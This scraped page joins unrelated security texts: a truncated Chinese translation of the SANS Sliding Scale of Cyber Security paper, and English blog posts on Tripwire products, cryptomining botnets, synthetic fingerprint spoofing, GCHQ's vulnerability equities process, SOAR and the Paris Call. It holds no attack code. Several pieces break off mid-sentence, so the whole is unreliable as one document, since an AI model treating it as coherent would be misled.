网络安全滑动标尺模型是针对网络安全活动和投资领域进行详细探讨的模型。该模型包含五大类别:架构安全、被动防御、主动防御、威胁情报和进攻。这五大类别构成连续性整体,让人一目了然:各阶段活动经精心设计,呈动态变化趋势。了解互相关联的这几大网络安全阶段后,组织和个人可更好地理解资源投资的目标和影响,构建安全计划成熟度模型,按阶段划分网络攻击从而进行根本原因分析,助力防御方的发展。弄明白各阶段含义后,组织和个人会发现该标尺左侧的类别用于奠定相应基础,使标尺中其他阶段的措施更易实现,可以使用较少资源发挥更大作用。组织和个人利用滑动标尺要达成的目标是从该标尺的左侧部分开始投入资源,解决上述问题,从而获得合理投资收益,然后将大量资源分配给其他类别。

该模型表明,若组织做了充分的防护准备,攻击者需付出更大代价才能成功。此外,利用该模型,防御方可确保安全措施与时俱进。

网络安全滑动标尺模型

网络安全滑动标尺模型对组织在威胁防御方面的措施、能力以及所做的资源投资进行分类,详细探讨了网络安全的方方面面。该模型可作为了解网络安全措施的框架。模型的标尺用途广泛,如向非技术人员解释安全技术事宜,对资源和各项技能投资进行优先级排序和追踪、评估安全态势以及确保事件根本原因分析准确无误。

如图1所示,该模型可划分为五大类别,即架构安全、被动防御、主动防御、威胁情报和进攻。本文将围绕这些类别展开介绍,着重分析各类别的差异以及内在联系。


【公益译文】网络安全滑动标尺模型 SANS分析师白皮书

图1 网络安全滑动标尺模型

各类别并非一成不变,且重要性也不均等

网络安全滑动标尺模型为组织和个人讨论网络安全的各类资源和技能投资提供了框架。该模型包含的五大类别――架构安全、被动防御、主动防御、威胁情报和进攻,各类别相互配合实现网络安全提升,但这些类别并不是一成不变的且其重要性也存在差异。

该模型使用了标尺,表明每个类别的某些措施与相邻类别密切相关。例如,修复软件漏洞属于架构安全范畴,而修复这一动作位于架构安全类别的右侧,要比构建系统更靠近被动防御类别。即便如此,架构安全涉及的措施也不能视为主动防御、情报或进攻相关活动。又如威胁情报活动,攻击者网络中开展的威胁情报活动更接近进攻活动,与搜集和分析开源信息相比,能够更快地转变为进攻活动。同样,收集和分析事件响应数据从而生成威胁情报更靠近主动防御类别,因为在此类别中,分析师会利用威胁情报达成防御目的。

滑动标尺的每个类别在安全方面的重要性并不均等。这一点可从本文在架构安全和进攻的对比中明显看出。若系统构建和实现过程考虑到了安全,则会显著提升这些系统的防御态势。要实现同样的安全目的,这些措施的投资收益远高于进攻。技术足够先进、目标极其坚定的攻击者总会找到办法绕过完善的架构。由此可见,投资不应仅对局限于架构本身。滑动标尺的每个类别都很重要,组织在考虑如何实现安全以及何时关注其他类别时应以预期投资收益为导向。比如,若组织对架构安全和被动防御缺乏维护会发现主动防御的价值不高,此类组织应首先修复基本问题再考虑威胁情报或进攻。

要实现网络安全目标,组织应构建安全根基和文化,并不断进行完善。这样,防御方在面对威胁和挑战时才能及时调整,更好地进行防御。由此可见,滑动标尺模型还能潜在促进组织的安全成熟进程。组织应首先将精力放在标尺左侧的类别,构筑相应基础,然后再对右侧的类别作出投资。组织在架构安全阶段进行合理投资会为其后有效实施被动防御打下了基础,能够获得更大收益。此外,主动防御若在具备完善架构安全和被动防御的环境中部署较易实现且更为有效。若缺乏该安全基础,开展网络安全监控或事件响应等主动防御活动则较为困难且开销较大。成本凸显的是各类别的投资收益,如图2所示。例如,要有效执行进攻行动,最起码要利用威胁情报,这需要组织充分了解其在主动防御、被动防御和架构安全阶段的安全措施,明确组织面临的威胁并进行应对。然而,进攻行动为组织带来的价值远不如合理构建和实施架构安全高。因此,我们强烈建议组织将主要精力放在滑动标尺左侧的阶段,从架构安全做起。


【公益译文】网络安全滑动标尺模型 SANS分析师白皮书

图2成本与安全价值

架构安全

架构安全:用安全思维规划、构建和维护系统。

安全的一个最重要方面是合理构建系统,使其与组织的任务、资金和人员配备相匹配。架构安全指在 用安全思维规划、构建和维护系统 。安全的系统设计是基础,在此之上才能开展其他方面的网络安全建设。此外,根据组织的需求合理构建架构安全,可提升标尺的其他阶段的效率,降低开销。例如,若网络分段不合理且未安装软件补丁进行维护,则存在很多安全问题,防御方可能疲于应对,导致网络攻击者等真正需要识别的威胁淹没于各类安全问题、相关恶意软件以及由于架构不合理而导致的网络配置问题中。

架构安全通常从规划和设计系统以支撑组织需求开始。为此,组织应首先明确IT系统要支撑的业务目标,这可能因公司和行业而异。系统安全应为这些目标提供支撑。架构安全阶段的目的并非是防御攻击者,而是要满足正常运营环境和紧急运营环境的需求,包括偶发的恶意软件感染、误配置系统带来的网络流量峰值、以及系统仅仅因部署在同一网络而互相导致中断。所有这些情形在当今联网基础设施的正常环境中都非常常见,而且还不仅限于这些问题。在系统设计时考虑这些情况可以维持系统的保密性、可用性和完整性,从而为组织的业务要求提供支撑。

安全的系统构建、采购和实现是架构安全的另一关键要素。要确保质量控制措施落到实处,保护链条中各环节的安全很重要。这些措施与应用安全补丁等系统维护相结合,让系统更易于防护。软件和硬件补丁应用有时被误认为是一项防御措施,实际上,它们本身并非防御措施,但是会促进安全。与合理架构相关的各项举措还会降低攻击面,最大程度地减少攻击者进入系统的机会,万一攻击者进入系统,还可限制其行为。

下文将介绍几个样本模型,作为实现上述类别相关实践的参考。

样本架构模型 国家标准与技术研究院(NIST)的800系列特刊

NIST发布的800系列特刊提供有关安全的系统采购、设计、实现和加固的多个指南。虽然系统架构由预期结果和系统需求驱动,这些特刊还是具有很好的指导意义。需特别关注的是800-137特刊“联邦信息系统与组织的信息安全持续监控”,该指南指出组织应持续主动监控网络,识别并及时修复安全违规和漏洞,以防止攻击者对其进行利用。

普渡企业参考体系结构

-The-普渡模型是工业控制系统网络的高层体系结构模型的一个范例。。该模型旨在说明需按照功能对各网段进行划分和隔离。合理划分网络能显著提升其防护能力。

支付卡行业数据安全标准(PCI DSS)

-PCI DSS作为信息安全标准,面向的是处理特定类型信用卡及其相关数据的组织。其中,一些标准与防火墙实现等被动防御相关,而大部分标准旨在实现架构安全,例如,开发和维护安全的系统、数据加密、持卡人数据访问限制以及不使用厂商提供的默认密码等要求都有助于实现合理的架构安全。

被动防御

组织在通过投资该模型的架构安全类别构建了合理的安全基础后,就非常有必要投资构筑被动防御了。被动防御位于架构安全的上层,为系统提供攻击防护。攻击者或威胁若心怀叵测且有能力造成损害,一旦找到机会便会绕过架构,无论架构有多完善,因此被动防御非常必要。在定义被动防御前,我们先了解一下该术语的历史。

防御在传统上可划分为被动防御和主动防御。上个世纪三十至八十年代(网络这一术语还未出现),围绕这两个术语的定义引发了众多纷争。美国国防部对被动防御作了如下定义,结束了长期纷争:为降低恶意行为几率以及尽量减少恶意行为引发的损害而采取的措施,而非主动采取行动。然而,该定义是否可用于网络安全领域一直是众多学者、安全从业者和军事专业人员争论的焦点。该定义可能看似容易理解,但将其应用到网络领域的正常运营环境就不会像字面解释这么简单了。

要实现从军事领域到网络领域的转换,需了解术语的真实含义,而非字面定义。在最初的争论中,被动防御指无需军事部门交互的情况下提供攻击防御。加固防御工事防止导弹轰炸便是一个例子。尽管这看起来类似于在系统中安装软件补丁,但与加固结构而非防护攻击更为接近。因此,它不属于防御,只是对系统所处典型环境的一种认知。安装补丁是一项维护措施。同样,为军事会议室构筑屏障,应对各种恶劣气候不是“对抗大风的被动防御”,而只是该环境所需的正常行为。加固屏障、设置诱饵、伪装以及针对会议室的其他二次措施才是被动防御。最后一点,现实世界还存在资源消耗情况。攻击者会消耗物理资源,如炸弹投放一个就少一个。在数字世界,攻击者并不以这种方式消耗资源。若攻击者使用了一种恶意软件,而未被发现或反击就会多次反复使用。在这种情况下,攻击者所需的是时间、相关资源及人力。消耗攻击者的资源,包括其策划和实现恶意目的所需的时间,对于防御者来说至关重要。被动防御可帮助您实现这一点。

被动防御:架构中添加的提供持续威胁防护和检测且无需经常人工互动的系统

了解被动防御术语的历史,我们或许会得出这样一个结论:可在结构中添加插件实现防护。防御攻击而未必增强系统自身能力这一理念可帮助我们得出被动防御的定义。在现实世界中,被动防御同样也不需要频繁的人工互动。因此,被动防御的定义为: 架构中添加的提供持续威胁防护和洞察且无需经常人工互动的系统。 架构中添加的样本系统,如防火墙、反恶意软件系统、入侵防御系统、防病毒系统、入侵检测系统和类似的传统安全系统,可提供资产防护、填补或缩小已知安全缺口,减少与威胁交互的机会,并提供威胁洞察分析。这些系统需定期维护、更换和保养,而不是需要时常人工互动才能运行。系统可能一直运行,但并非总是处于有效防护状态。目前,已有多个模型针对此类系统的部署提供建议。

建议被动防御模型 深度防御

深度防御是在系统架构上层实施被动防御的一个基础概念。该模型是一个确保被动防御系统贯穿整个网络的概要方案。并且,该模型也与对手资源消耗这一概念直接关联,将防御划分为多个层级,致使攻击者投入更多时间和精力才能实现其目标。不过,这要求分级防御不仅仅是使用了相同的技术,还意味着在被绕过时,就无法耗费攻击者的时间。

NIST的800系列特刊

NIST的800系列特刊提供了多个有关被动防御实施的文档。800-41、800-83和800-94特刊介绍了防火墙、反恶意软件系统和入侵防御系统,值得特别关注。

NIST网络安全框架

-NIST网络安全框架提出了帮助组织防御威胁的路线图,涵盖架构安全、被动防御和主动防御,不过,该框架的主要贡献在于就如何正确实现和使用被动防御提供了建议。该框架是一个为组织提供指导性帮助的优秀参考模型。

主动防御

被动防御机制在面对目标坚定、资源丰富的对手时会最终落败。针对这类技术先进、一意孤行的对手,需要采取主动的安全措施,同时还要有训练有素的安全人员来对抗训练有素的攻击者。至关重要的是,要对这些安全人员进行授权,保证其在安全架构内操作,而这样的安全架构应受到妥善部署的被动防御措施的保护及监控。然而,谈到网络安全时,媒体和新闻机构往往会误用主动防御一词,且对其理解各执己见。由于该术语屡屡被误用,所以我们需要深入探讨它的历史背景。

20世纪70年代,美国陆军在谈到陆地战时使用了“主动防御”一词,引发激烈辩论。一级上将威廉E德普伊(William E. DePuy)是陆军训练与条令司令部(Army Training and Doctrine Command)的第一任司令,他在1974年的一篇关于1973年阿拉伯/以色列战争的文章中使用了该词。文中,他谈及了防御方的动态而非静态的战斗能力:“这意味着防御方必须要有行动能力,必须对作战区域进 行主动防御。”之后,他进一步阐述了该术语的概念:“主动防御是指紧密联合的武装小组和特遣部队相互支持,在整个战斗区域从不同的位置展开战斗,连续不断地打击攻击者,最终拖垮攻击者。”他在1976的《美国陆军野战手册》100-5“军事行动”中收录了该词。德普伊将军后来指出,“主动防御”一词之所以饱受质疑,是因为对《野战手册》中的术语存在误解,尽管该手册被认为是开创了越战后的陆军条令先例。他表示,“‘主动防御’一词仅在100-5中作为形容词顺便提及而已,在71-2中很少提及。然而,在71-1中,‘主动防御’成为了该系列手册中所规定的防御原则的官方描述符。但是,正如我们之后看到的那样,对该术语的含义没有达成共识。”

军事领域对该术语莫衷一是,和当前在网络安全领域该术语使用的情形一致。但是,美国军方就军事行动方面(而非网络安全)的“主动防御”采用了官方定义。对传统战争来说,“主动防御”指:采用有限的进攻行动和反击,将敌人赶出被争夺的区域或位置。这里使用了“反击”一词,在网络安全领域,人们将其错误地按字面理解为“黑回去”。然而,这并非该术语的本意。事实证明,简单地将术语从战争的物理领域复制到网络安全中并不能准确地体现这些术语的含义。“主动防御”一词始终围绕的是机动性以及结合军事情报和指标来识别攻击、在防御区域/被争夺区域内应对攻击或对抗能力的能力。此外,还包括从对战中学习的能力。这在1965年开始的一项兰德研究中被重点提及,出现在关于使用综合防空系统跟踪洲际弹道导弹(ICBM)并在其击中目标之前进行摧毁的讨论之中。在谈及网络安全时需要注意的是,“反击”只发生在防御区内,且对抗的是能力,而不是对手。也就是说,网络安全中的“反击”在事件响应中可以得到更好的体现,因为事件响应涉及到人员通过遏制和补救威胁进行“反击”。事件响应者等人员不会在攻击者所在的网络或系统中对攻击者发动进攻,就像洲际弹道导弹的综合防空主动防御机制,这些机制只是摧毁导弹,而不是人或人所在的城市。

基于上述背景介绍以及理解,网络安全中的“主动防御”可被定义为:分析师监控、响应网络内部威胁、从中汲取经验并将知识应用其中的过程。这句话最后的“网络内部”很重要,进一步消除了“反击”即“黑回去”的误解。承担这一任务的分析师包括事件响应人、恶意软件逆向工程师、威胁分析师、网络安全监控分析师以及利用自己的环境探寻攻击者并进行响应的其他人员。

对分析师而不是工具的关注引入了一种主动的安全方法,突出了最初战略的意图:可操作性和适应性。系统本身无法提供主动防御,只能作为主动防守者的工具。同样,分析师仅坐在诸如系统信息和事件管理器之类的工具前面并不能让成为主动的防守者―这关乎行动和过程,就如人员的岗位安排和培训一样重要。使高级威胁持久且危险的是键盘背后的具有自适应能力和智慧的对手。打击这些对手需要同样灵活和聪明的防守者。


【公益译文】网络安全滑动标尺模型 SANS分析师白皮书

图3主动网络防御周期

主动防御建议模型: 主动网络防御周期

主动网络防御周期是本文作者创建的模型,是SANS ICS515―主动防御和事件响应课程的研究对象。

它由四个行动阶段构成,形成持续流程,以主动监控、响应攻击并从中汲取经验。这四个阶段是:威胁情报使用、资产识别与网络安全监控、事件响应以及威胁和环境操控,如图3所示。

网络安全监控

网络安全监控(NSM)在20世纪80年代被托德海伯林(Todd Heberlein)最终定义为一系列行动。当时,他开发了网络安全监控系统,用于检测网络入侵。随后,其他分析师推广和扩展了NSM的概念。值得注意的是,理查德贝杰利希(Richard Bejtlich)的作品拓展了这一领域,尤其是《网络安全监测之道》(The Tao of Network Security Monitoring)一书,让NSM引起了广泛关注。虽然NSM是主动网络防御周期的一个组成部分,但它本身就是一种模式,是一种主动防御方法。这种方法突出了分析师检测其环境内部对手的价值,可驱动对攻击事件而不是单一入侵的事件响应。

情报

情报:收集数据、利用数据获取信息并进行评估的过程,以填补之前所发现的知识鸿沟。

有效实现主动防御的秘诀之一是能够利用攻击者相关情报并通过情报推动环境中的安全变化、流程和行动。使用情报是主动防御的一部分,但输出情报属于情报类别。正是在这个阶段,分析师使用各种方法从各种来源收集了关于攻击者的数据、

Tripwire Products: Quick Reference Guide

$
0
0

Here at The State of Security , we cover everything from breaking stories about new cyberthreats to step-by-step guides on passing your next compliance audit . But today, we’d like to offer a straight-forward roundup of the Tripwire product suite.

Get to know the basics of Tripwire’s core solutions for FIM, SCM, VM and more. Without further ado…

SCM and FIM: Tripwire Enterprise
Tripwire Products: Quick Reference Guide

Tripwire’s flagship product is the industry standard for integrity monitoring and security configuration management . It’s essentially a security configuration management (SCM) suite that provides fully-integrated solutions for policy, file integrity monitoring (FIM) and remediation management.

The suite lets IT security, compliance and IT operations teams rapidly achieve a foundational level of security throughout their IT infrastructure by reducing the attack surface, increasing system integrity and delivering continuous compliance.

Tripwire Whitelist Profiler

You can augment Tripwire Enterprise with a number of add-ons like Tripwire Whitelist Profiler, which helps bridge the IT/OT gap by giving operational specialists better visibility into environments like industrial control systems (ICS) . ICS operators regularly find themselves needing to manage device-specific policies―a task made difficult when they only have default reporting tools at their disposal.

Tripwire Whitelist Profiler enables you to report on both authorized and unauthorized settings based on your whitelist: your set of permitted ICS settings. It also lets you verify that only approved users exist on your systems at any given time.

Tripwire Malware Detection
Tripwire Products: Quick Reference Guide

Tripwire Malware Detection is another extension of Tripwire Enterprise that identifies malware as soon as it is introduced into your system. Should any unwarranted changes appear on the critical servers monitored with Tripwire Enterprise, Tripwire Malware Detection can immediately inspect the changed or new file to identify malicious behavior.

Tripwire Malware Detection spins up suspicious files into a protected sandbox environment for inspection. A comprehensive PDF report is (Read more...)

Botnets Are Being Repurposed for Crypto Mining Malware: Kaspersky

$
0
0

A security bulletin released by Kaspersky Labs states that botnets are increasingly being used to distribute illicit crypto mining software.

In the note , analysts for the cybersecurity firm said Wednesday that the number of unique users attacked by crypto miners grew dramatically in the first three months of 2018. Such malware is designed to secretly reallocate an infected machine’s processing power to mine cryptocurrencies, with any proceeds going to the attacker.

According to Kaspersky, more users were infected in September than in January and “the threat is still current,” though it is unclear whether the recent collapse in the crypto markets’ prices will have an impact on the infection rate.

The firm’s analysts said that a noticeable drop in distributed denial of service (DDoS) attacks may be attributable to “the ‘reprofiling’ of botnets from DDoS attacks to cryptocurrency mining.”

As the note detailed:

“Evidence suggests that the owners of many well-known botnets have switched their attack vector toward mining. For example, the DDoS activity of the Yoyo botnet dropped dramatically, although there is no data about it being dismantled.”

A possible explanation for cybercriminals’ increased interest in crypto-mining may lie in the fact that once the malware is distributed, it’s difficult for victims and police to detect.

Of the various types of software identified and cataloged, most reconfigure a computer’s processor usage to allocate a small amount to mining, keeping users from noticing.

The organization further looked into reasons for the prevalence of this type of malware in some regions over others, concluding that regions with a lax legislative framework on pirated and illicitly distributed software are more likely to have victims ofcryptojacking.

U.S. users were the least affected by the attacks, constituting 1.33 percent of the total number detected, followed by users in Switzerland and Britain. However, countries with lax piracy laws like Kazkhstan, Vietnam and Indonesia topped the list.

“The more freely unlicensed software is distributed, the more miners there are. This is confirmed by our statistics, which indicates that miners most often land on victim computers together with pirated software,” the report said.

Image via Shutterstock


How AI and Machine Learning Can Fool Biometric Sensors

$
0
0

Both my phone and my tablet have fingerprint sensors. For some reason, my tablet never reads my fingerprint correctly, so I find I have to try multiple times before giving up and using another method of authentication to log on. But my phone’s sensor has worked great, allowing me quick access to my apps and giving me a sense of privacy that no one else can pick up my phone and use it.

However, fingerprints as a biometric authentication solution isn’t foolproof, and researchers from New York University and Michigan State University recently presented a paper on how easy it is to create synthetic fingerprints that can trick biometric sensors.

Recent Articles By Author

Canada’s New Data Privacy Law Now in Effect Consumer Data Protection Act: Forcing Accountability Your Employees Pose a Bigger Security Risk Than You Think
How AI and Machine Learning Can Fool Biometric Sensors

Suddenly, my phone―or anything that relies on fingerprint scans―doesn’t seem as private.

Already a Flawed Scan

I think it is important to point out that fingerprint sensors on our phones and tablets are already a flawed security protection. As the researchers explained, the sensors are so small that they only grab a small part of the fingerprint. This means that naturally, the chance of “matching” with another fingerprint increases. This concept led to something called MasterPrints, which the researchers didn’t develop but described: “MasterPrints are a set of real or synthetic fingerprints that can fortuitously match with a large number of other fingerprints. Therefore, they can be used by an adversary to launch a dictionary attack against a specific subject that can compromise the security of a fingerprint-based recognition system. This means, it is possible to ‘spoof’ the fingerprints of a subject without actually gaining any information about the subject’s fingerprint.”

The researchers then went a step beyond MasterPrints with DeepMasterPrints: “Images that are visually similar to natural fingerprint images.” This is the print that can spoof any type of fingerprint sensor, matching it to a number of different fingerprint identities. It is essentially the master key of fingerprints, and it could create chaos in a security world that sees biometric authentication as the most secure option available right now.

Using AI and ML to Generate Fingerprints

As The Guardian explained, the researchers used two particular properties of fingerprints and sensor technology to come up with DeepMasterPrints. First, it took advantage of the partial print scan done on smaller devices. Second, it used fingerprint features that are common as opposed to unique―in other words, our fingerprints are more alike than we realize. Then, the article stated, “the researchers used a common machine learning technique, called a generative adversarial network, to artificially create new fingerprints that matched as many partial fingerprints as possible.”

Dictionary Attacks, but for Fingerprints

How can synthetic fingerprints affect security? Just as hackers use dictionary attacks to generate potential passwords, the researchers concluded synthetic fingerprints could be used to launch dictionary-style attacks against systems that rely on this type of biometric authentication.

“Could” is the operative word here. It’s important to remember that this research was conducted in a controlled environment, proving synthetic fingerprints―and the science behind creating them―are possible.

“While that doesn’t invalidate the findings,” Sam Bakken, senior product marketing manager at OneSpan said in an email comment, “the costs of executing such an attack are far from negligible and attackers probably don’t see a good return-on-investment at this time.”

However, you know if it can be done in one setting, cybercriminals will work hard to replicate the findings for their own use. With this research, the rest of us are getting a bit of a head start to ensure our authentication systems are able to combat potential synthetic fingerprint hacks. That begins with a layered authentication that adds on to fingerprint biometrics.

“A layered approach might include taking into account additional contextual data (e.g., whether the authentication event is taking place on a compromised device or via an emulator, etc.) to score the risk associated with the transaction and if that risk is too high, ask the user to provide another authentication factor,” said Bakken.

Fingerprints are a popular biometric because they are easy for consumers to use―no passwords to remember and no added device necessary. But it is only a matter of time until they are no more secure than a user name and password combination.

Landmark GCHQ Publication Reveals Vulnerability Disclosure Process

$
0
0

Landmark GCHQ Publication Reveals Vulnerability Disclosure Process
Landmark GCHQ Publication Reveals Vulnerability Disclosure Process
Add to favorites

“Our default is to tell the vendor and have them fix it. But sometimes, after weighing up the implications, we decide to keep the fact of the vulnerability secret and develop intelligence capabilities with it”

GCHQ and NCSC today for the first time published the decision making process they use to decide whether to retain a technology vulnerability for intelligence purposes, or disclose it to a vendor to be patched.

Release of the so-called Equities Process is a move of striking transparency for the traditionally secretive signals intelligence organisation. It comes amid growing pressure from vendors to disclose all such finds.

Equities Process: Wait, What?

The UK’s GCHQ, like other intelligence agencies globally, conducts vulnerability research seeking out flaws in technology that can be exploited for intelligence purposes, either by malicious actors, or UK intelligence.


Landmark GCHQ Publication Reveals Vulnerability Disclosure Process
GCHQ Director Jeremy Fleming. Credit: GCHQ

Many it refers back to vendors for “repair”; indeed the NCSC was named one of the top five bounty hunters under Microsoft’s “bug bounty” programme this year.

Some it holds on to for intelligence purposes.

Such nation state retention of so called 0days, or previously unknown vulnerabilities, has become increasingly controversial however, after 0days stockpiled by governments leaked into the wild and were weaponised by “bad actors”.

Read this: Microsoft Demands “Digital Peace” What Does It Really Want? As Microsoft President Brad Smith last year put it : “The WannaCrypt exploits… were drawn from the exploits stolen from the National Security Agency, or NSA, in the United States. [They] provideyet another example of why the stockpiling of vulnerabilities by governments is such a problem. This is an emerging pattern…” He added: “Exploits in the hands of governments have leaked into the public domain and caused widespread damage. [We are calling for]governments to report vulnerabilities to vendors, rather than stockpile, sell, or exploit them.”

Jaya Baloo, the CISO of the Netherland’s KPN Telecom,speaking at an event on critical infrastructure security earlier this year was also blunt:“There is no vulnerabilities equity process. No sharing. If we want critical infrastructure security we need law enforcement and intelligence to share the info they know. Otherwise we are just creating both a white and a black market for vulnerabilities.”


Landmark GCHQ Publication Reveals Vulnerability Disclosure Process
GCHQ Equities Process: Intelligence Capabilities Have Their Place…

In a blog published alongside a description of the decision making process by which GCHQ and the NCSC decide when or not to disclose such finds, Dr Ian Levy, the NCSC’s technical director, however, said disclosing all finds would be “naive”.

He wrote: “Our default is to tell the vendor and have them fix it. But sometimes, after weighing up the implications, we decide to keep the fact of the vulnerability secret and develop intelligence capabilities with it.”

He added: “There has to be a very good reason not to either an overriding intelligence case, or the fact that disclosing could reduce the security of people who use the product and we really do mean it. From an NCSC point of view, some of our best technical folk are involved in the day-to-day decision making, and a couple of us not involved in the day-to-day process are available to the Equity Technical Panel and the Equity Board to provide senior, independent technical advice if necessary.

“We’ve also asked the Investigatory Powers Commissioner , who oversees the use of statutory powers by GCHQ, to provide oversight of the process we run to make sure we’re really taking the right things into account when making a decision. We think that provides world class assurance around this bit of our work,” he noted.


Landmark GCHQ Publication Reveals Vulnerability Disclosure Process
The GCHQ Foyer So, What’s the Process?

There has to be a “a clear and overriding national security benefit in retaining a vulnerability”, GCHQ said . It uses a trio of entities to help determine this (and has also adopted the ISO 29147 approach to vulnerability disclosure, it said).

1:The Equities Technical Panel (ETP), made up of a panel of subject matter experts from across the UK Intelligence Community including the NCSC.

2:The GCHQ Equity Board (EB), “which includes representation from other Government agencies and Departments as required”. This is chaired by “a senior civil servant with appropriate experience and expertise, usually drawn from the NCSC”.

3: The Equities Oversight Committee, chaired by the CEO of the NCSC, which “ensures the Equities Process is working… in accordance with specified procedures and which advises the NCSC ‘s CEO on equity decisions escalated from the Equity Board.”

Decision Criteria

In deciding whether to release or retain a vulnerability, GCHQ looks at these criteria:

Possible remediation. Consideration of the possible routes to mitigate the impact of the vulnerability, in particular focusing on whether there is a viable route to release, or whether releasing it would have a negative impact on national security.

Operational necessity.Consideration of the intelligence value to the UK in retaining the vulnerability, which includes the following questions:

What operational value can be gained from this capability? What are the intelligence opportunities from this capability? How reliant are we on this vulnerability to realise intelligence? How likely is a disclosure to impact other operational capabilities or partners

Defensive risk. An assessment of the impact on security of not releasing the vulnerability in the context of the UK and its allies, including Government departments, critical national infrastructure, companies and private citizens. This includes:

How likely is it that this vulnerability is/could be discovered by someone else? How likely is it that this vulnerability could be exploited by someone else? What technology/sector is exposed if left unpatched? What is the potential damage if the vulnerability is exploited? Without a patch applied to the software are other mitigation opportunities possible such as configuration changes? Ultimately, GCHQ concludes, although when discovering a vulnerability its starting point is to disclose it, retaining knowledge of the vulnerability, “can be used to gather intelligence and disrupt the activ

SOAR Doesn’t Have Mood Swings

$
0
0

If you looked back at how your cyberdefense centers have evolved, you’ll realize that you’ve only thrown more eyeballs on the screen to deal the with the ever-expanding threat landscape. The challenge for the current team is to stay afloat in this endless stream of alerts and identify, rank and respond to the most critical ones. Given that cybersecurity data doubles every year, you’d soon be looking at a real estate problem―you will need to house an exponentially increasing number of analysts to handle the exponentially growing number of alerts. What seems like a challenge today, will be an impossible task tomorrow. Amid these non-stop threat notifications, you realize that it’s only a matter of time until someone drops the ball.

SOC at Scale: That’s a Problem. Here’s Why

You have security information and event management (SIEM) systems that listen to the chatter from around the infrastructure. Hopefully, they help us connect the dots. Next, there are analysts at the security operations center (SOC) who crunch these alerts and validate threats, weeding out false positives and prioritizing events of interest. This process is easy if it works, but the reality is different. The ratio of false positives to meaningful alerts turns the game. Add to that our love for mindless notifications. This creates tremendous pressure on the SOC by requiring analysts to be “extra” attentive to ensure nothing slips through. Let’s face it; it is painful to spend time analyzing alerts and eventually discover that some of them are not even real.

The equation is simple: More alerts requires more analysts. You are now hunting for the right talent while trying not to settle for whatever is available. After you hire, you realize that this is just the beginning. Next, you start worrying about training them, helping them with the process and finally holding on to them. However, the fact remains that more the people in your SOC, the more it seems like a mishap is around the corner.

Same Problem, Different Outcomes

If you give the same incident to 30 analysts in a SOC, you are likely to see six different lines of investigation and four of which won’t achieve the desired end goal. This is due to a skills gap that also ensures you have a vibrant spread of reaction times in your weekly report. And because it is impossible to have all your analysts at the same skill level, you end up leaning on your superstar handlers during times of stress.

As a culture, analysts must continually be kept aware of the threat landscape and helped to build strategies to tackle these threats. While these strategies are sometimes standardized, most of the times threats are left to the good judgment of the handler.

The State of Mind is a Significant Contributor

Running a SOC is like managing a team that must win at all costs. As in a group, where having all members switched on at all times is a challenge, in a SOC, temperaments play a part in bringing out varying results from every individual. Laxity (and similar traits) in mundane tasks can result in significant breaches. Let’s also get practical here; even skilled analysts can make errors when inundated with this deluge.

Going from Machine to Machine

Validating an alert is critical because it is here that an alert becomes a possible threat. The process of validation can include multiple internal and external checks and cross-checks against other devices or endpoints.

Typically, the validation process accounts for about two-thirds of the time required for investigating a threat. Security orchestration automation and response (SOAR) helps in connecting the threat management life cycle to API-driven service providers that respond with third-party intelligence on the threat. SOAR brings capabilities that validate threats internally and externally (using these third-party threat intelligence partners). Today, the majority of the validation checks done by analysts (including correlations) can be automated.

As per a study performed on MSSPs (predominantly servicing customers in India), it takes an average of 170 minutes from the time a threat is identified to the time a response action is initiated. This is because response is a manual process, and different levels of validation are performed before initiating a response action.

By chaining these response actions after an automated validation check, we can cut down the dwell time of an attacker significantly and save time spent in investigating mundane alerts.

Making SOAR Work for You

SOAR platforms allow binding validation and response plugins based on defined logic; these platforms have the benefit of integrating with various data providers and network and security components. The most effective way of implementing automation is to:

Collect past alerts and group similar threats. Pick threats that occur the most. Notice the path of investigation and the combination of validations and response analysts take for each threat type. Mark validation and response blocks that can be automated.

After the first phase of automation, you could look at a more connected approach using security orchestration. Multiple playbooks can be connected, allowing investigations to automatically branch out into different directions. In a way, train systems to handle threats like humans.

The Outcome

Introducing SOAR capabilities into your business is the beginning of quick decision-making and rapid response without human errors. SOAR is the best escape for analysts stuck in the maze of SIEM alerts. It enriches events to prevent false positive alerts from lowering the sensitivity bar, streamlines your incident response workflows and improves overall security operations―incident response times define effective cybersecurity.

After figuring out the exact steps in the human (as-is) process, as a part of SOAR, you can automate them to reduce the personnel workload by more than 41 percent. This means 410/1,000 alerts can be automated! Even the remaining 59 percent have contextual information added to assist analysis, enabling speedy and accurate decision-making. Security is no longer a trade-off between the two.

Your SOC analysts will rock―minus the mood swings!

Perspectives on the ‘Paris Call’

$
0
0

“We the People of the United States, in Order to form a more perfect Union”

“Four score and seven years ago”

“I have a dream”

These are very well known quotes to every American. These quotes where opening salvos by great leaders who knew we had to come together for change and for good. Although the quotes I know off the top of my head are provincial, I also know that when there is a time that requires change, a time people must come together, for good, we should be listening to great leaders around the world.

Earlier this month, French President Emmanuel Macron made the call to come together and address a global challenge, the need for data security in cyberspace. Without data security there can be no trust, bad actors can wreak havoc, and we the people can have our lives quickly turned upside down by hackers. There isn’t a day that goes by without news of how hackers, terrorists, and nation states are infiltrating the foundations of what President Macron defines as “information and communication technologies (ICT).”


Perspectives on the ‘Paris Call’

Macron made the opening salvo to address this problem, globally and together, not only through piecemeal regulations. He rolled out the “ Paris Call for Trust and Security in Cyberspace ”. He called for leaders to reaffirm “our support to an open, secure, stable, accessible and peaceful cyberspace, which has become an integral component of life in all its social, economic, cultural and political aspects.”

Essentially, he is asking to apply the best practices we learned as a society from world wars and large scale disasters to the new world of cyberspace. The document calls for leaders to condemn malicious cyber activities in peacetime, just as we do for traditional invasions and attacks on infrastructure and indiscriminant attacks on individuals. He asks that we support victims of malicious use of ICTs and for stakeholders to cooperate to protect and respond to such attacks.

The Paris Call lists out nine norms, all of which you can find in the link above. Here’s a sampling of three:

Strengthen our capacity to prevent malign interference by foreign actors aimed at undermining electoral processes through malicious cyber activities Prevent ICT (information and communication technologies) enabled theft of intellectual property, including trade secrets or other confidential business information, with the intent of providing competitive advantages to companies or commercial sector Strengthen the security of digital processes, products and services, throughout their lifecycle and supply chain

The U.K., Canada, and New Zealand have all signed on, along with leadership from Microsoft, Google, IBM, and HP. It is reported that the United States is in ‘talks’ and has not yet signed onto the initiative. We should all hope that China and Russia join in this effort too. What is important is that the call has been made and it has early success. I’m hopeful that this is the start of more collaboration and ultimately a safer cyber environment for working, living and playing in cyberspace. Incredible changes for good often take time and may never be entirely reached, but they always start with the call for moving together towards a dream with the goal of perfection. It is time for us to start this journey, globally and together.

